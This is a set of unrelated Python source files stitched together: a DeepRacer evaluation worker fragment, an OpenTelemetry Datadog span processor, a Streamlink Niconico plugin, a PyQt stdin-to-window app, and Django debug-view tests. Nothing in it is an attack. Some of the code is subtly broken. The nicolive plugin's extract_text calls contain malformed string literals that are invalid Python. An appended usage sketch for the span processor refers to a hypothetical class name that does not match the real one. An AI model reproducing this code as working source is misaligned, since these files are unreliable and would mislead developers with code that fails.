ConfigParams.IS_CONTINUOUS.value: args.is_continuous,
ConfigParams.RACE_TYPE.value: args.race_type,
ConfigParams.COLLISION_PENALTY.value: args.collision_penalty,
ConfigParams.OFF_TRACK_PENALTY.value: args.off_track_penalty,
ConfigParams.START_POSITION.value: start_positions[agent_index],
ConfigParams.DONE_CONDITION.value: done_condition,
},
}
metrics_s3_config = {
MetricsS3Keys.METRICS_BUCKET.value: metrics_s3_buckets[agent_index],
MetricsS3Keys.METRICS_KEY.value: metrics_s3_object_keys[agent_index],
# Replaced rospy.get_param('AWS_REGION') to be equal to the argument being passed
# or default argument set
MetricsS3Keys.REGION.value: args.aws_region,
}
aws_region = rospy.get_param("AWS_REGION", args.aws_region)
if simtrace_s3_bucket:
simtrace_video_s3_writers.append(
SimtraceVideo(
upload_type=SimtraceVideoNames.SIMTRACE_EVAL.value,
bucket=simtrace_s3_bucket[agent_index],
s3_prefix=simtrace_s3_object_prefix[agent_index],
region_name=aws_region,
local_path=SIMTRACE_EVAL_LOCAL_PATH_FORMAT.format(agent_name),
)
)
if mp4_s3_bucket:
simtrace_video_s3_writers.extend(
[
SimtraceVideo(
upload_type=SimtraceVideoNames.PIP.value,
bucket=mp4_s3_bucket[agent_index],
s3_prefix=mp4_s3_object_prefix[agent_index],
region_name=aws_region,
local_path=CAMERA_PIP_MP4_LOCAL_PATH_FORMAT.format(agent_name),
),
SimtraceVideo(
upload_type=SimtraceVideoNames.DEGREE45.value,
bucket=mp4_s3_bucket[agent_index],
s3_prefix=mp4_s3_object_prefix[agent_index],
region_name=aws_region,
local_path=CAMERA_45DEGREE_LOCAL_PATH_FORMAT.format(agent_name),
),
SimtraceVideo(
upload_type=SimtraceVideoNames.TOPVIEW.value,
bucket=mp4_s3_bucket[agent_index],
s3_prefix=mp4_s3_object_prefix[agent_index],
region_name=aws_region,
local_path=CAMERA_TOPVIEW_LOCAL_PATH_FORMAT.format(agent_name),
),
]
)
run_phase_subject = RunPhaseSubject()
agent_list.append(
create_rollout_agent(
agent_config,
EvalMetrics(agent_name, metrics_s3_config, args.is_continuous),
run_phase_subject,
)
)
agent_list.append(create_obstacles_agent())
agent_list.append(create_bot_cars_agent())
# ROS service to indicate all the robomaker markov packages are ready for consumption
signal_robomaker_markov_package_ready()
PhaseObserver("/agent/training_phase", run_phase_subject)
enable_domain_randomization = utils.str2bool(
rospy.get_param("ENABLE_DOMAIN_RANDOMIZATION", False)
)
sm_hyperparams_dict = {}
# Make the clients that will allow us to pause and unpause the physics
rospy.wait_for_service("/gazebo/pause_physics_dr")
rospy.wait_for_service("/gazebo/unpause_physics_dr")
pause_physics = ServiceProxyWrapper("/gazebo/pause_physics_dr", Empty)
unpause_physics = ServiceProxyWrapper("/gazebo/unpause_physics_dr", Empty)
graph_manager, _ = get_graph_manager(
hp_dict=sm_hyperparams_dict,
agent_list=agent_list,
run_phase_subject=run_phase_subject,
enable_domain_randomization=enable_domain_randomization,
done_condition=done_condition,
pause_physics=pause_physics,
unpause_physics=unpause_physics,
)
ds_params_instance = S3BotoDataStoreParameters(checkpoint_dict=checkpoint_dict)
graph_manager.data_store = S3BotoDataStore(
params=ds_params_instance, graph_manager=graph_manager, ignore_lock=True
)
graph_manager.env_params.seed = 0
task_parameters = TaskParameters()
task_parameters.checkpoint_restore_path = args.local_model_directory
evaluation_worker(
graph_manager=graph_manager,
number_of_trials=args.number_of_trials,
task_parameters=task_parameters,
simtrace_video_s3_writers=simtrace_video_s3_writers,
is_continuous=args.is_continuous,
park_positions=park_positions,
race_type=args.race_type,
pause_physics=pause_physics,
unpause_physics=unpause_physics,
)
if __name__ == "__main__":
try:
rospy.init_node("rl_coach", anonymous=True)
main()
except ValueError as err:
if utils.is_user_error(err):
log_and_exit(
"User modified model/model_metadata: {}".format(err),
SIMAPP_SIMULATION_WORKER_EXCEPTION,
SIMAPP_EVENT_ERROR_CODE_500,
)
else:
log_and_exit(
"Eval worker value error: {}".format(err),
SIMAPP_SIMULATION_WORKER_EXCEPTION,
SIMAPP_EVENT_ERROR_CODE_500,
)
except GenericRolloutError as ex:
ex.log_except_and_exit()
except GenericRolloutException as ex:
ex.log_except_and_exit()
except Exception as ex:
log_and_exit(
"Eval worker error: {}".format(ex),
SIMAPP_SIMULATION_WORKER_EXCEPTION,
SIMAPP_EVENT_ERROR_CODE_500,
)
|
spanprocessor.py
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import logging
import threading
import typing
from opentelemetry.context import Context, attach, detach, set_value
from opentelemetry.sdk.trace import Span, SpanProcessor
from opentelemetry.sdk.trace.export import SpanExporter
from opentelemetry.trace import INVALID_TRACE_ID
from opentelemetry.util._time import _time_ns
logger = logging.getLogger(__name__)
class DatadogExportSpanProcessor(SpanProcessor):
"""Datadog exporter span processor
DatadogExportSpanProcessor is an implementation of `SpanProcessor` that
batches all opened spans into a list per trace. When all spans for a trace
    are ended, the trace is queued up for export. This is required for exporting
    to the Datadog Agent, which expects to receive a list of spans for each trace.
"""
_FLUSH_TOKEN = INVALID_TRACE_ID
def __init__(
self,
span_exporter: SpanExporter,
schedule_delay_millis: float = 5000,
max_trace_size: int = 4096,
):
if max_trace_size <= 0:
            raise ValueError("max_trace_size must be a positive integer.")
if schedule_delay_millis <= 0:
raise ValueError("schedule_delay_millis must be positive.")
self.span_exporter = span_exporter
# queue trace_ids for traces with recently ended spans for worker thread to check
# for exporting
self.check_traces_queue = (
collections.deque()
) # type: typing.Deque[int]
self.traces_lock = threading.Lock()
# dictionary of trace_ids to a list of spans where the first span is the
# first opened span for the trace
self.traces = collections.defaultdict(list)
# counter to keep track of the number of spans and ended spans for a
# trace_id
self.traces_spans_count = collections.Counter()
self.traces_spans_ended_count = collections.Counter()
self.worker_thread = threading.Thread(target=self.worker, daemon=True)
# threading conditions used for flushing and shutdown
self.condition = threading.Condition(threading.Lock())
self.flush_condition = threading.Condition(threading.Lock())
        # flag to indicate that there is a flush operation in progress
self._flushing = False
self.max_trace_size = max_trace_size
self._spans_dropped = False
self.schedule_delay_millis = schedule_delay_millis
self.done = False
self.worker_thread.start()
def on_start(
self, span: Span, parent_context: typing.Optional[Context] = None
) -> None:
ctx = span.get_span_context()
trace_id = ctx.trace_id
with self.traces_lock:
# check upper bound on number of spans for trace before adding new
# span
if self.traces_spans_count[trace_id] == self.max_trace_size:
logger.warning("Max spans for trace, spans will be dropped.")
self._spans_dropped = True
return
# add span to end of list for a trace and update the counter
self.traces[trace_id].append(span)
self.traces_spans_count[trace_id] += 1
def on_end(self, span: Span) -> None:
if self.done:
logger.warning("Already shutdown, dropping span.")
return
ctx = span.get_span_context()
trace_id = ctx.trace_id
with self.traces_lock:
self.traces_spans_ended_count[trace_id] += 1
if self.is_trace_exportable(trace_id):
self.check_traces_queue.appendleft(trace_id)
def worker(self):
timeout = self.schedule_delay_millis / 1e3
while not self.done:
if not self._flushing:
with self.condition:
self.condition.wait(timeout)
if not self.check_traces_queue:
# spurious notification, let's wait again, reset timeout
timeout = self.schedule_delay_millis / 1e3
continue
if self.done:
# missing spans will be sent when calling flush
break
            # subtract the duration of this export call from the next timeout
start = _time_ns()
self.export()
end = _time_ns()
duration = (end - start) / 1e9
timeout = self.schedule_delay_millis / 1e3 - duration
# be sure that all spans are sent
self._drain_queue()
def is_trace_exportable(self, trace_id):
return (
self.traces_spans_count[trace_id]
- self.traces_spans_ended_count[trace_id]
<= 0
)
def export(self) -> None:
"""Exports traces with finished spans."""
notify_flush = False
export_trace_ids = []
while self.check_traces_queue:
trace_id = self.check_traces_queue.pop()
if trace_id is self._FLUSH_TOKEN:
notify_flush = True
else:
with self.traces_lock:
# check whether trace is exportable again in case that new
# spans were started since we last concluded trace was
# exportable
if self.is_trace_exportable(trace_id):
export_trace_ids.append(trace_id)
del self.traces_spans_count[trace_id]
del self.traces_spans_ended_count[trace_id]
if len(export_trace_ids) > 0:
token = attach(set_value("suppress_instrumentation", True))
for trace_id in export_trace_ids:
with self.traces_lock:
try:
# Ignore type b/c the Optional[None]+slicing is too "clever"
# for mypy
self.span_exporter.export(self.traces[trace_id]) # type: ignore
# pylint: disable=broad-except
except Exception:
logger.exception(
"Exception while exporting Span batch."
)
finally:
del self.traces[trace_id]
detach(token)
if notify_flush:
with self.flush_condition:
self.flush_condition.notify()
def _drain_queue(self):
"""Export all elements until queue is empty.
Can only be called from the worker thread context because it invokes
`export` that is not thread safe.
"""
while self.check_traces_queue:
self.export()
def force_flush(self, timeout_millis: int = 30000) -> bool:
if self.done:
logger.warning("Already shutdown, ignoring call to force_flush().")
return True
self._flushing = True
self.check_traces_queue.appendleft(self._FLUSH_TOKEN)
# wake up worker thread
with self.condition:
self.condition.notify_all()
# wait for token to be processed
with self.flush_condition:
ret = self.flush_condition.wait(timeout_millis / 1e3)
self._flushing = False
if not ret:
logger.warning("Timeout was exceeded in force_flush().")
return ret
def shutdown(self) -> None:
# signal the worker thread to finish and then wait for it
self.done = True
with self.condition:
self.condition.notify_all()
self.worker_thread.join()
self.span_exporter.shutdown()
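# --- Hedged usage sketch (not part of the processor above) ---------------------
# A minimal illustration of how a span processor like the one defined above is
# typically registered with the OpenTelemetry Python SDK. The processor class
# name and constructor arguments in the commented lines are assumptions for
# illustration only; substitute the real class defined in this module.
if __name__ == "__main__":
    from opentelemetry import trace
    from opentelemetry.sdk.trace import TracerProvider

    provider = TracerProvider()
    # from opentelemetry.sdk.trace.export import ConsoleSpanExporter
    # processor = TraceGroupingSpanProcessor(          # hypothetical name/signature
    #     ConsoleSpanExporter(), schedule_delay_millis=5000, max_trace_size=1024)
    # provider.add_span_processor(processor)
    trace.set_tracer_provider(provider)

    tracer = trace.get_tracer(__name__)
    with tracer.start_as_current_span("parent"):
        with tracer.start_as_current_span("child"):
            pass
    # shutdown() on the provider calls shutdown() on each registered processor,
    # which (for the processor above) drains the queue and exports ended traces.
    provider.shutdown()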
|
nicolive.py
|
import json
import logging
import re
import threading
import time
from urllib.parse import unquote_plus, urlparse
import websocket
from streamlink.plugin import Plugin, PluginArgument, PluginArguments
from streamlink.plugin.api import useragents
from streamlink.stream import HLSStream
_log = logging.getLogger(__name__)
_url_re = re.compile(
r"^https?://(?P<domain>live[0-9]*\.nicovideo\.jp)/watch/lv[0-9]*")
_login_url = "https://account.nicovideo.jp/login/redirector"
_login_url_params = {
"show_button_twitter": 1,
"show_button_facebook": 1,
"next_url": "/"}
class NicoLive(Plugin):
arguments = PluginArguments(
PluginArgument(
"email",
argument_name="niconico-email",
sensitive=True,
metavar="EMAIL",
help="The email or phone number associated with your "
"Niconico account"),
PluginArgument(
"password",
argument_name="niconico-password",
sensitive=True,
metavar="PASSWORD",
help="The password of your Niconico account"),
PluginArgument(
"user-session",
argument_name="niconico-user-session",
sensitive=True,
metavar="VALUE",
help="Value of the user-session token \n(can be used in "
"case you do not want to put your password here)"))
is_stream_ready = False
is_stream_ended = False
watching_interval = 30
watching_interval_worker_thread = None
stream_reader = None
_ws = None
frontend_id = None
@classmethod
def can_handle_url(cls, url):
return _url_re.match(url) is not None
def _get_streams(self):
self.url = self.url.split("?")[0]
self.session.http.headers.update({
"User-Agent": useragents.CHROME,
})
if not self.get_wss_api_url():
_log.debug("Coundn't extract wss_api_url. Attempting login...")
if not self.niconico_web_login():
return None
if not self.get_wss_api_url():
_log.error("Failed to get wss_api_url.")
_log.error(
"Please check if the URL is correct, "
"and make sure your account has access to the video.")
return None
self.api_connect(self.wss_api_url)
i = 0
while not self.is_stream_ready:
if i % 10 == 0:
_log.debug("Waiting for permit...")
if i == 600:
_log.error("Waiting for permit timed out.")
return None
if self.is_stream_ended:
return None
time.sleep(0.1)
i += 1
streams = HLSStream.parse_variant_playlist(
self.session, self.hls_stream_url)
nico_streams = {}
for s in streams:
nico_stream = NicoHLSStream(streams[s], self)
nico_streams[s] = nico_stream
return nico_streams
def get_wss_api_url(self):
_log.debug("Getting video page: {0}".format(self.url))
resp = self.session.http.get(self.url)
try:
self.wss_api_url = extract_text(
resp.text, ""webSocketUrl":"", """)
if not self.wss_api_url:
return False
except Exception as e:
_log.debug(e)
_log.debug("Failed to extract wss api url")
return False
try:
self.frontend_id = extract_text(
resp.text, ""frontendId":", ","")
except Exception as e:
_log.debug(e)
_log.warning("Failed to extract frontend id")
self.wss_api_url = "{0}&frontend_id={1}".format(self.wss_api_url, self.frontend_id)
_log.debug("Video page response code: {0}".format(resp.status_code))
_log.trace("Video page response body: {0}".format(resp.text))
_log.debug("Got wss_api_url: {0}".format(self.wss_api_url))
_log.debug("Got frontend_id: {0}".format(self.frontend_id))
return self.wss_api_url.startswith("wss://")
def api_on_open(self):
self.send_playerversion()
require_new_stream = not self.is_stream_ready
self.send_getpermit(require_new_stream=require_new_stream)
def api_on_error(self, ws, error=None):
if error:
_log.warning(error)
_log.warning("wss api disconnected.")
_log.warning("Attempting to reconnect in 5 secs...")
time.sleep(5)
self.api_connect(self.wss_api_url)
def api_connect(self, url):
# Proxy support adapted from the UStreamTV plugin (ustreamtv.py)
proxy_url = self.session.get_option("https-proxy")
if proxy_url is None:
proxy_url = self.session.get_option("http-proxy")
proxy_options = parse_proxy_url(proxy_url)
if proxy_options.get('http_proxy_host'):
_log.debug("Using proxy ({0}://{1}:{2})".format(
proxy_options.get('proxy_type') or "http",
proxy_options.get('http_proxy_host'),
proxy_options.get('http_proxy_port') or 80))
_log.debug("Connecting: {0}".format(url))
self._ws = websocket.WebSocketApp(
url,
header=["User-Agent: {0}".format(useragents.CHROME)],
on_open=self.api_on_open,
on_message=self.handle_api_message,
on_error=self.api_on_error)
self.ws_worker_thread = threading.Thread(
target=self._ws.run_forever,
            kwargs=proxy_options)
self.ws_worker_thread.daemon = True
self.ws_worker_thread.start()
def send_message(self, type_, body):
msg = {"type": type_, "body": body}
msg_json = json.dumps(msg)
_log.debug(f"Sending: {msg_json}")
if self._ws and self._ws.sock.connected:
self._ws.send(msg_json)
else:
_log.warning("wss api is not connected.")
def send_no_body_message(self, type_):
msg = {"type": type_}
msg_json = json.dumps(msg)
_log.debug(f"Sending: {msg_json}")
if self._ws and self._ws.sock.connected:
self._ws.send(msg_json)
else:
_log.warning("wss api is not connected.")
def send_custom_message(self, msg):
msg_json = json.dumps(msg)
_log.debug(f"Sending: {msg_json}")
if self._ws and self._ws.sock.connected:
self._ws.send(msg_json)
else:
_log.warning("wss api is not connected.")
def send_playerversion(self):
body = {
"type": "startWatching",
"data": {
"stream": {
"quality": "abr",
"protocol": "hls",
"latency": "high",
"chasePlay": False
},
"room": {
"protocol": "webSocket",
"commentable": True
},
"reconnect": False
}
}
self.send_custom_message(body)
def send_getpermit(self, require_new_stream=True):
body = {
"type": "getAkashic",
"data": {
"chasePlay": False
}
}
self.send_custom_message(body)
def send_watching(self):
body = {
"command": "watching",
"params": [self.broadcast_id, "-1", "0"]
}
self.send_message("watch", body)
def send_pong(self):
self.send_no_body_message("pong")
self.send_no_body_message("keepSeat")
def handle_api_message(self, message):
_log.debug(f"Received: {message}")
message_parsed = json.loads(message)
if message_parsed["type"] == "stream":
data = message_parsed["data"]
self.hls_stream_url = data["uri"]
self.is_stream_ready = True
if message_parsed["type"] == "watch":
body = message_parsed["body"]
command = body["command"]
if command == "currentstream":
current_stream = body["currentStream"]
self.hls_stream_url = current_stream["uri"]
self.is_stream_ready = True
elif command == "watchinginterval":
self.watching_interval = int(body["params"][0])
_log.debug("Got watching_interval: {0}".format(
self.watching_interval))
if self.watching_interval_worker_thread is None:
_log.debug("send_watching_scheduler starting.")
self.watching_interval_worker_thread = threading.Thread(
target=self.send_watching_scheduler)
self.watching_interval_worker_thread.daemon = True
self.watching_interval_worker_thread.start()
else:
_log.debug("send_watching_scheduler already running.")
elif command == "disconnect":
_log.info("Websocket API closed.")
_log.info("Stream ended.")
self.is_stream_ended = True
if self.stream_reader is not None:
self.stream_reader.close()
_log.info("Stream reader closed.")
elif message_parsed["type"] == "ping":
self.send_pong()
def send_watching_scheduler(self):
"""
Periodically send "watching" command to the API.
This is necessary to keep the session alive.
"""
while not self.is_stream_ended:
self.send_watching()
time.sleep(self.watching_interval)
def niconico_web_login(self):
user_session = self.get_option("user-session")
email = self.get_option("email")
password = self.get_option("password")
if user_session is not None:
_log.info("User session cookie is provided. Using it.")
self.session.http.cookies.set(
"user_session",
user_session,
path="/",
domain="nicovideo.jp")
self.save_cookies()
return True
elif email is not None and password is not None:
_log.info("Email and password are provided. Attemping login.")
payload = {"mail_tel": email, "password": password}
resp = self.session.http.post(_login_url, data=payload,
params=_login_url_params)
_log.debug("Login response code: {0}".format(resp.status_code))
_log.trace("Login response body: {0}".format(resp.text))
_log.debug("Cookies: {0}".format(
self.session.http.cookies.get_dict()))
if self.session.http.cookies.get("user_session") is None:
try:
msg = extract_text(
resp.text, '<p class="notice__text">', "</p>")
except Exception as e:
_log.debug(e)
msg = "unknown reason"
_log.warning("Login failed. {0}".format(msg))
return False
else:
_log.info("Logged in.")
self.save_cookies()
return True
else:
_log.warning(
"Neither a email and password combination nor a user session "
"token is provided. Cannot attempt login.")
return False
class NicoHLSStream(HLSStream):
def __init__(self, hls_stream, nicolive_plugin):
super().__init__(
hls_stream.session,
force_restart=hls_stream.force_restart,
start_offset=hls_stream.start_offset,
duration=hls_stream.duration,
**hls_stream.args)
# url is already in hls_stream.args
self.nicolive_plugin = nicolive_plugin
def open(self):
reader = super().open()
self.nicolive_plugin.stream_reader = reader
return reader
def extract_text(text, left, right):
"""Extract text from HTML"""
result = re.findall("{0}(.*?){1}".format(left, right), text)
if len(result) != 1:
raise Exception("Failed to extract string. "
"Expected 1, found {0}".format(len(result)))
return result[0]
def parse_proxy_url(purl):
"""Adapted from UStreamTV plugin (ustreamtv.py)"""
proxy_options = {}
if purl:
p = urlparse(purl)
proxy_options['proxy_type'] = p.scheme
proxy_options['http_proxy_host'] = p.hostname
if p.port:
proxy_options['http_proxy_port'] = p.port
if p.username:
proxy_options['http_proxy_auth'] = \
(unquote_plus(p.username), unquote_plus(p.password or ""))
return proxy_options
__plugin__ = NicoLive
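# --- Hedged example (not part of the plugin) ------------------------------------
# Quick illustration of the two module-level helpers above; the sample inputs are
# made up. Running this file directly requires the plugin's dependencies
# (streamlink, websocket-client) to be installed.
if __name__ == "__main__":
    sample_html = 'data-props="{&quot;webSocketUrl&quot;:&quot;wss://example.invalid/ws&quot;}"'
    print(extract_text(sample_html, "&quot;webSocketUrl&quot;:&quot;", "&quot;"))
    # -> wss://example.invalid/ws
    print(parse_proxy_url("http://user:pass@127.0.0.1:3128"))
    # -> {'proxy_type': 'http', 'http_proxy_host': '127.0.0.1',
    #     'http_proxy_port': 3128, 'http_proxy_auth': ('user', 'pass')}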
|
app_win.py
|
#!/usr/bin/env python3
import threading
import sys
import queue
from PyQt5 import QtCore, QtWidgets
from app_win_frm import *
global mesg_q
mesg_q = queue.Queue()
global Quitting
Quitting = False
def worker(mesg_q=mesg_q):
app = QtWidgets.QApplication(sys.argv)
window = QtWidgets.QMainWindow()
ui = Ui_window()
ui.setupUi(window)
def cmdOk_Click():
print(ui.txtName.text(), flush=True)
ui.cmdOk.clicked.connect(cmdOk_Click)
window.move(0, 0)
window.show()
    def onCloseWindow():
        # Quitting is a module-level flag; declare it global so the assignment
        # below is visible to the stdin loop at the bottom of the file.
        global Quitting
        Quitting = True
app.quit()
sys.exit(0)
window.destroyed.connect(onCloseWindow)
def MsgAction(TextRcv):
ui.txtName.setText(TextRcv)
def ChkInputs():
if Quitting:
ui.tmrTimer.stop()
else:
if not mesg_q.empty():
MsgAction(mesg_q.get())
ui.tmrTimer = QtCore.QTimer()
ui.tmrTimer.setInterval(50)
ui.tmrTimer.timeout.connect(ChkInputs)
ui.tmrTimer.start()
sys.exit(app.exec_())
WindowThd = threading.Thread(target=worker)
# WindowThd.daemon = True
WindowThd.start()
line = ""
while not Quitting:
line = input()
if line != "":
mesg_q.put(line)
line = ""
|
test_debug.py
|
import importlib
import inspect
import os
import re
import sys
import tempfile
import threading
from io import StringIO
from pathlib import Path
from unittest import mock
from django.core import mail
from django.core.files.uploadedfile import SimpleUploadedFile
from django.db import DatabaseError, connection
from django.shortcuts import render
from django.template import TemplateDoesNotExist
from django.test import RequestFactory, SimpleTestCase, override_settings
from django.test.utils import LoggingCaptureMixin
from django.urls import path, reverse
from django.utils.functional import SimpleLazyObject
from django.utils.safestring import mark_safe
from django.views.debug import (
CLEANSED_SUBSTITUTE, CallableSettingWrapper, ExceptionReporter,
Path as DebugPath, cleanse_setting, default_urlconf,
technical_404_response, technical_500_response,
)
from ..views import (
custom_exception_reporter_filter_view, index_page,
multivalue_dict_key_error, non_sensitive_view, paranoid_view,
sensitive_args_function_caller, sensitive_kwargs_function_caller,
sensitive_method_view, sensitive_view,
)
class User:
def __str__(self):
return 'jacob'
class WithoutEmptyPathUrls:
urlpatterns = [path('url/', index_page, name='url')]
class CallableSettingWrapperTests(SimpleTestCase):
""" Unittests for CallableSettingWrapper
"""
def test_repr(self):
class WrappedCallable:
def __repr__(self):
return "repr from the wrapped callable"
def __call__(self):
pass
actual = repr(CallableSettingWrapper(WrappedCallable()))
self.assertEqual(actual, "repr from the wrapped callable")
@override_settings(DEBUG=True, ROOT_URLCONF='view_tests.urls')
class DebugViewTests(SimpleTestCase):
def test_files(self):
with self.assertLogs('django.request', 'ERROR'):
response = self.client.get('/raises/')
self.assertEqual(response.status_code, 500)
data = {
'file_data.txt': SimpleUploadedFile('file_data.txt', b'haha'),
}
with self.assertLogs('django.request', 'ERROR'):
response = self.client.post('/raises/', data)
self.assertContains(response, 'file_data.txt', status_code=500)
self.assertNotContains(response, 'haha', status_code=500)
def test_400(self):
# When DEBUG=True, technical_500_template() is called.
with self.assertLogs('django.security', 'WARNING'):
response = self.client.get('/raises400/')
self.assertContains(response, '<div class="context" id="', status_code=400)
# Ensure no 403.html template exists to test the default case.
@override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
}])
def test_403(self):
response = self.client.get('/raises403/')
self.assertContains(response, '<h1>403 Forbidden</h1>', status_code=403)
# Set up a test 403.html template.
@override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'OPTIONS': {
'loaders': [
('django.template.loaders.locmem.Loader', {
'403.html': 'This is a test template for a 403 error ({{ exception }}).',
}),
],
},
}])
def test_403_template(self):
response = self.client.get('/raises403/')
self.assertContains(response, 'test template', status_code=403)
self.assertContains(response, '(Insufficient Permissions).', status_code=403)
def test_404(self):
response = self.client.get('/raises404/')
self.assertEqual(response.status_code, 404)
self.assertContains(response, "<code>not-in-urls</code>, didn't match", status_code=404)
def test_404_not_in_urls(self):
response = self.client.get('/not-in-urls')
self.assertNotContains(response, "Raised by:", status_code=404)
self.assertContains(response, "Django tried these URL patterns", status_code=404)
self.assertContains(response, "<code>not-in-urls</code>, didn't match", status_code=404)
# Pattern and view name of a RegexURLPattern appear.
self.assertContains(response, r"^regex-post/(?P<pk>[0-9]+)/$", status_code=404)
self.assertContains(response, "[name='regex-post']", status_code=404)
# Pattern and view name of a RoutePattern appear.
self.assertContains(response, r"path-post/<int:pk>/", status_code=404)
self.assertContains(response, "[name='path-post']", status_code=404)
@override_settings(ROOT_URLCONF=WithoutEmptyPathUrls)
def test_404_empty_path_not_in_urls(self):
response = self.client.get('/')
self.assertContains(response, "The empty path didn't match any of these.", status_code=404)
def test_technical_404(self):
response = self.client.get('/technical404/')
self.assertContains(response, "Raised by:", status_code=404)
self.assertContains(response, "view_tests.views.technical404", status_code=404)
def test_classbased_technical_404(self):
response = self.client.get('/classbased404/')
self.assertContains(response, "Raised by:", status_code=404)
self.assertContains(response, "view_tests.views.Http404View", status_code=404)
def test_non_l10ned_numeric_ids(self):
"""
Numeric IDs and fancy traceback context blocks line numbers shouldn't be localized.
"""
with self.settings(DEBUG=True, USE_L10N=True):
with self.assertLogs('django.request', 'ERROR'):
response = self.client.get('/raises500/')
# We look for a HTML fragment of the form
# '<div class="context" id="c38123208">', not '<div class="context" id="c38,123,208"'
self.assertContains(response, '<div class="context" id="', status_code=500)
match = re.search(b'<div class="context" id="(?P<id>[^"]+)">', response.content)
self.assertIsNotNone(match)
id_repr = match.group('id')
self.assertFalse(
re.search(b'[^c0-9]', id_repr),
"Numeric IDs in debug response HTML page shouldn't be localized (value: %s)." % id_repr.decode()
)
def test_template_exceptions(self):
with self.assertLogs('django.request', 'ERROR'):
try:
self.client.get(reverse('template_exception'))
except Exception:
raising_loc = inspect.trace()[-1][-2][0].strip()
self.assertNotEqual(
raising_loc.find("raise Exception('boom')"), -1,
"Failed to find 'raise Exception' in last frame of "
"traceback, instead found: %s" % raising_loc
)
def test_template_loader_postmortem(self):
"""Tests for not existing file"""
template_name = "notfound.html"
with tempfile.NamedTemporaryFile(prefix=template_name) as tmpfile:
tempdir = os.path.dirname(tmpfile.name)
template_path = os.path.join(tempdir, template_name)
with override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [tempdir],
}]), self.assertLogs('django.request', 'ERROR'):
response = self.client.get(reverse('raises_template_does_not_exist', kwargs={"path": template_name}))
self.assertContains(response, "%s (Source does not exist)" % template_path, status_code=500, count=2)
# Assert as HTML.
self.assertContains(
response,
'<li><code>django.template.loaders.filesystem.Loader</code>: '
'%s (Source does not exist)</li>' % os.path.join(tempdir, 'notfound.html'),
status_code=500,
html=True,
)
def test_no_template_source_loaders(self):
"""
Make sure if you don't specify a template, the debug view doesn't blow up.
"""
with self.assertLogs('django.request', 'ERROR'):
with self.assertRaises(TemplateDoesNotExist):
self.client.get('/render_no_template/')
@override_settings(ROOT_URLCONF='view_tests.default_urls')
def test_default_urlconf_template(self):
"""
        Make sure that the default URLconf template is shown instead
of the technical 404 page, if the user has not altered their
URLconf yet.
"""
response = self.client.get('/')
self.assertContains(
response,
"<h2>The install worked successfully! Congratulations!</h2>"
)
@override_settings(ROOT_URLCONF='view_tests.regression_21530_urls')
def test_regression_21530(self):
"""
Regression test for bug #21530.
If the admin app include is replaced with exactly one url
pattern, then the technical 404 template should be displayed.
The bug here was that an AttributeError caused a 500 response.
"""
response = self.client.get('/')
self.assertContains(
response,
"Page not found <span>(404)</span>",
status_code=404
)
def test_template_encoding(self):
"""
The templates are loaded directly, not via a template loader, and
should be opened as utf-8 charset as is the default specified on
template engines.
"""
with mock.patch.object(DebugPath, 'open') as m:
default_urlconf(None)
m.assert_called_once_with(encoding='utf-8')
m.reset_mock()
technical_404_response(mock.MagicMock(), mock.Mock())
m.assert_called_once_with(encoding='utf-8')
class DebugViewQueriesAllowedTests(SimpleTestCase):
# May need a query to initialize MySQL connection
databases = {'default'}
def test_handle_db_exception(self):
"""
Ensure the debug view works when a database exception is raised by
performing an invalid query and passing the exception to the debug view.
"""
with connection.cursor() as cursor:
try:
cursor.execute('INVALID SQL')
except DatabaseError:
exc_info = sys.exc_info()
rf = RequestFactory()
response = technical_500_response(rf.get('/'), *exc_info)
self.assertContains(response, 'OperationalError at /', status_code=500)
@override_settings(
DEBUG=True,
ROOT_URLCONF='view_tests.urls',
# No template directories are configured, so no templates will be found.
TEMPLATES=[{
'BACKEND': 'django.template.backends.dummy.TemplateStrings',
}],
)
class NonDjangoTemplatesDebugViewTests(SimpleTestCase):
def test_400(self):
# When DEBUG=True, technical_500_template() is called.
with self.assertLogs('django.security', 'WARNING'):
response = self.client.get('/raises400/')
self.assertContains(response, '<div class="context" id="', status_code=400)
def test_403(self):
response = self.client.get('/raises403/')
self.assertContains(response, '<h1>403 Forbidden</h1>', status_code=403)
def test_404(self):
response = self.client.get('/raises404/')
self.assertEqual(response.status_code, 404)
def test_template_not_found_error(self):
# Raises a TemplateDoesNotExist exception and shows the debug view.
url = reverse('raises_template_does_not_exist', kwargs={"path": "notfound.html"})
with self.assertLogs('django.request', 'ERROR'):
response = self.client.get(url)
self.assertContains(response, '<div class="context" id="', status_code=500)
class ExceptionReporterTests(SimpleTestCase):
rf = RequestFactory()
def test_request_and_exception(self):
"A simple exception report can be generated"
try:
request = self.rf.get('/test_view/')
request.user = User()
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>ValueError at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">Can't find my keys</pre>', html)
self.assertIn('<th>Request Method:</th>', html)
self.assertIn('<th>Request URL:</th>', html)
self.assertIn('<h3 id="user-info">USER</h3>', html)
self.assertIn('<p>jacob</p>', html)
self.assertIn('<th>Exception Type:</th>', html)
self.assertIn('<th>Exception Value:</th>', html)
self.assertIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertNotIn('<p>Request data not supplied</p>', html)
self.assertIn('<p>No POST data</p>', html)
def test_no_request(self):
"An exception report can be generated without request"
try:
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>ValueError</h1>', html)
self.assertIn('<pre class="exception_value">Can't find my keys</pre>', html)
self.assertNotIn('<th>Request Method:</th>', html)
self.assertNotIn('<th>Request URL:</th>', html)
self.assertNotIn('<h3 id="user-info">USER</h3>', html)
self.assertIn('<th>Exception Type:</th>', html)
